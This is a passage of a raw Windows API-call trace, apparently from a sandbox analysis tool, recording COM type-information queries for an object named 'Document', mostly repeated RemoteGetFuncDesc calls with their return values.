riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x145ed0 | out: ppvObject=0x145ed0*=0x0) returned 0x80004002 [0068.312] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b240f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145e18 | out: ppvObject=0x145e18*=0x695c8c0) returned 0x0 [0068.312] ITypeInfo2:GetCustData (in: This=0x695c8c0, GUID=0x7fee3b2d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x145e28 | out: pVarVal=0x145e28*(varType=0x0, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0068.312] IUnknown:Release (This=0x695c8c0) returned 0x2 [0068.312] ITypeInfo:RemoteGetDocumentation (in: This=0x695c8c0, memid=-1, refPtrFlags=0x145e20, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x145e40 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x145e40*="") returned 0x0 [0068.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x145d30, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0068.313] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0068.313] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c970, ppTypeAttr=0x145e20, pDummy=0x0 | out: ppTypeAttr=0x145e20, pDummy=0x0) returned 0x0 [0068.313] ITypeInfo:LocalReleaseTypeAttr (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x0, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.313] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.313] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x10, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x11, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x12, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x13, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x14, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x15, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x16, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x17, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x18, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x19, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1a, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1b, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1c, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1d, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1e, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.314] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.314] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1f, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.315] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x20, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x21, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x22, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x23, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x24, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x25, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x26, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x27, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x28, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x29, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2a, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2b, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.316] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2c, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2d, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2e, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2f, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x30, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x31, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x32, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x33, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x34, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x35, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x36, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x37, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x38, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x39, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3a, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3b, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3c, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3d, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.317] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3e, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3f, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x40, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x41, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x42, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x43, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x44, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x45, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x46, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x47, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x48, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x49, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4a, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4b, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4c, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4d, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4e, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4f, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.318] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x50, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x51, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x52, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x53, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x54, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x55, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x56, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x57, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x58, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x59, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5a, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5b, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5c, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5d, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5e, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5f, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.319] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.319] 